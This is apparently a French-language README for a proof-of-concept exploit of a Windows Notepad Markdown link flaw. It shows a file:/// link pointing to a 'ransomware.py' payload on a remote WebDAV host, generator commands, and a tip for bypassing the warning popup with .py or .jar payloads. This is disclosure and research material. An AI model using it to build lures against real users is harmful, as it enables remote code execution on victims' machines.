
PoC pour le 'Windows Notepad RCE'
PoC de la vulnérabilité « Windows Notepad RCE ».
La « vulnérabilité » est simple. Le moteur Markdown du Bloc-notes Windows ne se soucie pas des protocoles d'URL obscurs. En tant qu'analyste de malwares, j'ai lu de nombreux rapports sur le déploiement de payloads via WebDAV et SMB. D'après ce document, on peut abuser du protocole file:/// et créer une URL qui pointe vers un fichier sur un serveur WebDAV/SMB.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
J'ai créé deux scripts. Un en Node.js et l'autre en Python. Les deux créent un fichier Markdown pointant vers un payload WebDAV. Vous pouvez utiliser les payloads d'exemple dans le dossier sample-payloads.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
Le résultat (poc.md) apparaîtra dans le répertoire courant.
La plupart des extensions de fichiers de payload (par ex. .exe, .lnk, .vbs, ...) déclencheront toujours un avertissement intégré malgré la vulnérabilité de l'application Bloc-notes. L'avertissement vient de Windows lui-même. Au moins, tout ce que j'ai testé et qui peut mener à l'exécution de code sur une installation par défaut (OOB) affiche cet avertissement obligatoire.

Si l'appareil cible dispose de Python ou Java installé, vous pouvez utiliser un payload .py ou .jar pour contourner la pop-up d'avertissement.

Cliquer sur le lien affiche désormais un nouvel avertissement contextuel.
Vous pouvez trouver la version vulnérable du Bloc-notes Windows sur Uptodown. N'oubliez pas de vérifier la signature numérique de l'installeur et de vous assurer qu'elle provient de Microsoft. De plus, vous devriez tester ce PoC uniquement dans une machine virtuelle.
Restez prudent et amusez-vous bien !